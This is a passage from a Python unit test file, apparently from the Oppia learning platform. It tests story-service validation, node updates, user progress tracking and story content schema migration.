'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': 'node_1',
'old_value': [],
'new_value': ['node_2']
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': 'exp_id_2'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(
['exp_id_2', 'exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'All explorations in a story should be of the same category. '
'The explorations with ID exp_id_2 and exp_id_1 have different '
'categories.'])
with self.assertRaisesRegexp(
Exception, 'All explorations in a story should be of the '
'same category'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_other_languages(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
language_code='es', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Invalid language es found for exploration with ID exp_id_1.'])
with self.assertRaisesRegexp(
Exception, 'Invalid language es found for exploration with '
'ID exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_without_correctness_feedback(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
language_code='en')
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Expected all explorations to have correctness feedback '
'enabled. Invalid exploration: exp_id_1'])
with self.assertRaisesRegexp(
Exception, 'Expected all explorations to have correctness feedback '
'enabled. Invalid exploration: exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_invalid_interactions(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
interaction_id='LogicProof', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Invalid interaction LogicProof in exploration with ID: '
'exp_id_1.'])
with self.assertRaisesRegexp(
Exception, 'Invalid interaction LogicProof in exploration with '
'ID: exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_recommended_exps(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
interaction_id='TextInput', end_state_name='End',
correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
exp_services.update_exploration(
self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': (
exp_domain.STATE_PROPERTY_INTERACTION_CUST_ARGS),
'state_name': 'End',
'new_value': {
'recommendedExplorationIds': {
'value': ['1', '2']
}
}
})], 'Updated State Content')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Exploration with ID: exp_id_1 contains exploration '
'recommendations in its EndExploration interaction.'])
with self.assertRaisesRegexp(
Exception, 'Exploration with ID: exp_id_1 contains exploration '
'recommendations in its EndExploration interaction.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_invalid_rte_content(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
end_state_name='End', correctness_feedback_enabled=True)
self.publish_exploration(self.user_id_a, 'exp_id_1')
exp_services.update_exploration(
self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_CONTENT,
'state_name': 'Introduction',
'new_value': {
'content_id': 'content',
'html': (
'<oppia-noninteractive-collapsible content-with-value='
'"&quot;&lt;p&gt;Hello&lt;/p&gt;'
'&quot;" heading-with-value="&quot;'
'SubCollapsible&quot;">'
'</oppia-noninteractive-collapsible>')
}
})],
'Updated State Content.')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'RTE content in state Introduction of exploration with '
'ID exp_id_1 is not supported on mobile.'])
with self.assertRaisesRegexp(
Exception, 'RTE content in state Introduction of exploration with '
'ID exp_id_1 is not supported on mobile.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_exps_with_parameter_values(self):
topic_services.publish_story(
self.TOPIC_ID, self.STORY_ID, self.user_id_admin)
self.save_new_valid_exploration(
'exp_id_1', self.user_id_a, title='title', category='Category 1',
correctness_feedback_enabled=True)
exp_services.update_exploration(
self.user_id_a, 'exp_id_1', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY,
'property_name': 'param_specs',
'new_value': {
'theParameter':
param_domain.ParamSpec('UnicodeString').to_dict()
}
})],
'')
self.publish_exploration(self.user_id_a, 'exp_id_1')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id_1'
})
]
validation_error_messages = (
story_services.validate_explorations_for_story(['exp_id_1'], False))
self.assertEqual(
validation_error_messages, [
'Expected no exploration to have parameter values in'
' it. Invalid exploration: exp_id_1'])
with self.assertRaisesRegexp(
Exception, 'Expected no exploration to have parameter values in'
' it. Invalid exploration: exp_id_1'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
self.save_new_valid_exploration(
'exp_id_2', self.user_id_a, title='title 2', category='Category 1',
interaction_id='LogicProof', correctness_feedback_enabled=True)
exp_services.update_exploration(
self.user_id_a, 'exp_id_2', [exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_EXPLORATION_PROPERTY,
'property_name': 'param_specs',
'new_value': {
'param1':
param_domain.ParamSpec('UnicodeString').to_dict()
}
}), exp_domain.ExplorationChange({
'cmd': exp_domain.CMD_EDIT_STATE_PROPERTY,
'property_name': exp_domain.STATE_PROPERTY_PARAM_CHANGES,
'state_name': feconf.DEFAULT_INIT_STATE_NAME,
'new_value': [
param_domain.ParamChange('param1', 'Copier', {}).to_dict()]
})],
'')
self.publish_exploration(self.user_id_a, 'exp_id_2')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': 'exp_id_1',
'new_value': 'exp_id_2'
})
]
with self.assertRaisesRegexp(
Exception, 'Expected no exploration to have parameter values in'
' it. Invalid exploration: exp_id_2'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_cannot_update_story_with_mismatch_of_story_versions(self):
self.save_new_default_exploration(
'exp_id', self.user_id_a, title='title')
self.publish_exploration(self.user_id_a, 'exp_id')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id'
})]
story_model = story_models.StoryModel.get(self.STORY_ID)
story_model.version = 0
story_model.commit(self.user_id_a, 'Changed version', [])
with self.assertRaisesRegexp(
Exception,
'Unexpected error: trying to update version 1 of story '
'from version 2. Please reload the page and try again.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
story_model = story_models.StoryModel.get(self.STORY_ID)
story_model.version = 10
story_model.commit(self.user_id_a, 'Changed version', [])
with self.assertRaisesRegexp(
Exception,
'Trying to update version 11 of story from version 2, '
'which is too old. Please reload the page and try again.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
def test_get_story_by_version(self):
topic_id = topic_fetchers.get_new_topic_id()
story_id = story_services.get_new_story_id()
self.save_new_topic(
topic_id, self.USER_ID, name='A different topic',
abbreviated_name='different-topic', url_fragment='different-topic',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[],
next_subtopic_id=0)
self.save_new_story(
story_id, self.USER_ID, topic_id, title='new title')
topic_services.add_canonical_story(self.USER_ID, topic_id, story_id)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_PROPERTY,
'property_name': story_domain.STORY_PROPERTY_LANGUAGE_CODE,
'old_value': 'en',
'new_value': 'bn'
})]
story_services.update_story(
self.USER_ID, story_id, change_list,
'Updated story language_code.')
story_v1 = story_fetchers.get_story_by_id(story_id, version=1)
story_v2 = story_fetchers.get_story_by_id(story_id, version=2)
self.assertEqual(story_v1.language_code, 'en')
self.assertEqual(story_v2.language_code, 'bn')
def test_cannot_update_initial_node_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': story_domain.INITIAL_NODE_ID,
'old_value': '',
'new_value': 'new_initial_node_id'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id new_initial_node_id is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story initial_node_id.')
def test_rearrange_node_in_story(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist, 'Added story node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].id, self.NODE_ID_1)
self.assertEqual(story.story_contents.nodes[1].id, self.NODE_ID_2)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': story_domain.NODE,
'old_value': 1,
'new_value': 0
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Added story node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(story.story_contents.nodes[0].id, self.NODE_ID_2)
self.assertEqual(story.story_contents.nodes[1].id, self.NODE_ID_1)
def test_cannot_update_node_exploration_id_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'exp_id'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story node_exploration_id.')
def test_cannot_update_node_exploration_id_with_existing_exploration_id(
self):
self.save_new_default_exploration(
'exp_id', self.user_id_a, title='title')
self.publish_exploration(self.user_id_a, 'exp_id')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_1,
'old_value': None,
'new_value': 'exp_id'
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Updated story node.')
change_list = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_1,
'old_value': [],
'new_value': [self.NODE_ID_2]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_EXPLORATION_ID),
'node_id': self.NODE_ID_2,
'old_value': None,
'new_value': 'exp_id'
})
]
with self.assertRaisesRegexp(
Exception,
'A node with exploration id exp_id already exists.'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story node_exploration_id.')
def test_cannot_update_destination_node_ids_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': 'invalid_node',
'old_value': [],
'new_value': []
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story new_destination_node_ids.')
def test_cannot_update_new_prerequisite_skill_ids_with_invalid_node_id(
self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_PREREQUISITE_SKILL_IDS),
'node_id': 'invalid_node',
'old_value': [],
'new_value': []
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Updated story new_prerequisite_skill_ids.')
def test_cannot_mark_node_outline_as_unfinalized_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': 'invalid_node',
'old_value': '',
'new_value': ''
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Mark node outline as unfinalized.')
def test_cannot_mark_node_outline_as_finalized_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_value'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Mark node outline as finalized.')
def test_cannot_update_node_title_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': story_domain.STORY_NODE_PROPERTY_TITLE,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_title'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Update node title.')
def test_cannot_update_node_description_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': story_domain.STORY_NODE_PROPERTY_DESCRIPTION,
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_description'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Update node description.')
def test_cannot_update_node_thumbnail_filename_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_FILENAME),
'node_id': 'invalid_node',
'old_value': '',
'new_value': 'new_image.svg'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Update node thumbnail filename.')
def test_cannot_update_node_thumbnail_bg_color_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_THUMBNAIL_BG_COLOR),
'node_id': 'invalid_node',
'old_value': '',
'new_value': '#F8BF74'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list,
'Update node thumbnail bg color.')
def test_cannot_delete_node_with_invalid_node_id(self):
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': 'invalid_node'
})]
with self.assertRaisesRegexp(
Exception,
'The node with id invalid_node is not part of this story'):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Delete node.')
def test_cannot_delete_starting_node_of_story(self):
changelist = [
story_domain.StoryChange({
'cmd': story_domain.CMD_ADD_STORY_NODE,
'node_id': self.NODE_ID_2,
'title': 'Title 2'
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY,
'property_name': (
story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS),
'node_id': self.NODE_ID_2,
'old_value': [],
'new_value': [self.NODE_ID_1]
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS,
'node_id': self.NODE_ID_2,
'old_value': False,
'new_value': True
}),
story_domain.StoryChange({
'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY,
'property_name': (
story_domain.INITIAL_NODE_ID),
'old_value': self.NODE_ID_1,
'new_value': self.NODE_ID_2
})
]
story_services.update_story(
self.USER_ID, self.STORY_ID, changelist, 'Added node.')
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_2
})]
with self.assertRaisesRegexp(
Exception,
'The node with id %s is the starting node for the story, '
'change the starting node before deleting it.' % self.NODE_ID_2):
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Delete node.')
def test_delete_initial_node(self):
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertEqual(
story.story_contents.initial_node_id, self.NODE_ID_1)
change_list = [story_domain.StoryChange({
'cmd': story_domain.CMD_DELETE_STORY_NODE,
'node_id': self.NODE_ID_1
})]
story_services.update_story(
self.USER_ID, self.STORY_ID, change_list, 'Delete node.')
story = story_fetchers.get_story_by_id(self.STORY_ID)
self.assertIsNone(story.story_contents.initial_node_id)
class StoryProgressUnitTests(test_utils.GenericTestBase):
"""Tests functions which deal with any progress a user has made within a
story, including query and recording methods related to nodes
which are completed in the context of the story.
"""
def _get_progress_model(self, user_id, STORY_ID):
"""Returns the StoryProgressModel corresponding to the story id and user
id.
"""
return user_models.StoryProgressModel.get(
user_id, STORY_ID, strict=False)
def _record_completion(self, user_id, STORY_ID, node_id):
"""Records the completion of a node in the context of a story."""
story_services.record_completed_node_in_story_context(
user_id, STORY_ID, node_id)
def setUp(self):
super(StoryProgressUnitTests, self).setUp()
self.STORY_1_ID = 'story_id'
self.STORY_ID_1 = 'story_id_1'
self.NODE_ID_1 = 'node_1'
self.NODE_ID_2 = 'node_2'
self.NODE_ID_3 = 'node_3'
self.NODE_ID_4 = 'node_4'
self.USER_ID = 'user'
self.owner_id = 'owner'
self.TOPIC_ID = topic_fetchers.get_new_topic_id()
self.save_new_topic(
self.TOPIC_ID, self.USER_ID, name='New Topic',
abbreviated_name='topic-two', url_fragment='topic-two',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[],
next_subtopic_id=0)
story = story_domain.Story.create_default_story(
self.STORY_1_ID, 'Title', 'Description', self.TOPIC_ID, 'title')
self.node_1 = {
'id': self.NODE_ID_1,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 1',
'description': 'Description 1',
'destination_node_ids': ['node_2'],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.node_2 = {
'id': self.NODE_ID_2,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 2',
'description': 'Description 2',
'destination_node_ids': ['node_3'],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.node_3 = {
'id': self.NODE_ID_3,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 3',
'description': 'Description 3',
'destination_node_ids': ['node_4'],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
self.node_4 = {
'id': self.NODE_ID_4,
'thumbnail_filename': 'image.svg',
'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[
'chapter'][0],
'thumbnail_size_in_bytes': 21131,
'title': 'Title 4',
'description': 'Description 4',
'destination_node_ids': [],
'acquired_skill_ids': [],
'prerequisite_skill_ids': [],
'outline': '',
'outline_is_finalized': False,
'exploration_id': None
}
story.story_contents.nodes = [
story_domain.StoryNode.from_dict(self.node_1),
story_domain.StoryNode.from_dict(self.node_2),
story_domain.StoryNode.from_dict(self.node_3),
story_domain.StoryNode.from_dict(self.node_4)
]
self.nodes = story.story_contents.nodes
story.story_contents.initial_node_id = 'node_1'
story.story_contents.next_node_id = 'node_5'
story_services.save_new_story(self.USER_ID, story)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, story.id)
def test_get_completed_node_ids(self):
# There should be no exception if the user or story do not exist;
# it should also return an empty list in both of these situations.
self.assertEqual(story_fetchers.get_completed_node_ids(
'Fake', self.STORY_1_ID), [])
self.assertEqual(story_fetchers.get_completed_node_ids(
self.owner_id, 'Fake'), [])
# If no model exists, there should be no completed node IDs.
self.assertIsNone(
self._get_progress_model(self.owner_id, self.STORY_1_ID))
self.assertEqual(story_fetchers.get_completed_node_ids(
self.owner_id, self.STORY_1_ID), [])
# If the first node is completed, it should be reported.
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self.assertEqual(story_fetchers.get_completed_node_ids(
self.owner_id, self.STORY_1_ID), [self.NODE_ID_1])
# If all nodes are completed, all of them should be reported.
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self.assertEqual(
story_fetchers.get_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_1, self.NODE_ID_2, self.NODE_ID_3])
def test_get_latest_completed_node_ids(self):
self.assertIsNone(
self._get_progress_model(self.owner_id, self.STORY_1_ID))
self.assertEqual(story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID), [])
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_1])
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4])
def test_get_latest_completed_node_ids_different_completion_order(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4])
def test_get_latest_completed_node_ids_multiple_completions(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4)
self.assertEqual(
story_fetchers.get_latest_completed_node_ids(
self.owner_id, self.STORY_1_ID),
[self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4])
def test_get_completed_nodes_in_story(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
for ind, completed_node in enumerate(
story_fetchers.get_completed_nodes_in_story(
self.owner_id, self.STORY_1_ID)):
self.assertEqual(
completed_node.to_dict(), self.nodes[ind].to_dict())
def test_get_pending_and_all_nodes_in_story(self):
self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
# The starting index is 1 because the first story node is completed,
# and the pending nodes will start from the second node.
for index, pending_node in enumerate(
story_fetchers.get_pending_and_all_nodes_in_story(
self.owner_id, self.STORY_1_ID)['pending_nodes'], start=1):
self.assertEqual(
pending_node.to_dict(), self.nodes[index].to_dict())
def test_record_completed_node_in_story_context(self):
# Ensure that node completed within the context of a story are
# recorded correctly. This test actually validates both
# test_get_completed_node_ids and
# test_get_next_node_id_to_be_completed_by_user.
# By default, no completion model should exist for a given user and
# story.
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertIsNone(completion_model)
# If the user 'completes an node', the model should record it.
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertIsNotNone(completion_model)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1])
# If the same node is completed again within the context of this
# story, it should not be duplicated.
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_1)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1])
# If the same node and another are completed within the context
# of a different story, it shouldn't affect this one.
self.save_new_story(self.STORY_ID_1, self.USER_ID, self.TOPIC_ID)
topic_services.add_canonical_story(
self.USER_ID, self.TOPIC_ID, self.STORY_ID_1)
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_ID_1, self.NODE_ID_1)
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_ID_1, self.NODE_ID_2)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1])
# If two more nodes are completed, they are recorded.
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_2)
story_services.record_completed_node_in_story_context(
self.owner_id, self.STORY_1_ID, self.NODE_ID_3)
completion_model = self._get_progress_model(
self.owner_id, self.STORY_1_ID)
self.assertEqual(
completion_model.completed_node_ids, [
self.NODE_ID_1, self.NODE_ID_2, self.NODE_ID_3])
class StoryContentsMigrationTests(test_utils.GenericTestBase):
def test_migrate_story_contents_to_latest_schema(self):
story_id = story_services.get_new_story_id()
topic_id = topic_fetchers.get_new_topic_id()
user_id = 'user_id'
self.save_new_topic(
topic_id, user_id, name='Topic',
abbreviated_name='topic-three', url_fragment='topic-three',
description='A new topic',
canonical_story_ids=[], additional_story_ids=[],
uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0)
story_model = story_models.StoryModel(
id=story_id,
description='Description',
title='Title',
language_code='1',
story_contents_schema_version=1,
notes='Notes',
corresponding_topic_id=topic_id,
story_contents=self.VERSION_1_STORY_CONTENTS_DICT
)
current_schema_version_swap = self.swap(
feconf, 'CURRENT_STORY_CONTENTS_SCHEMA_VERSION', 5)
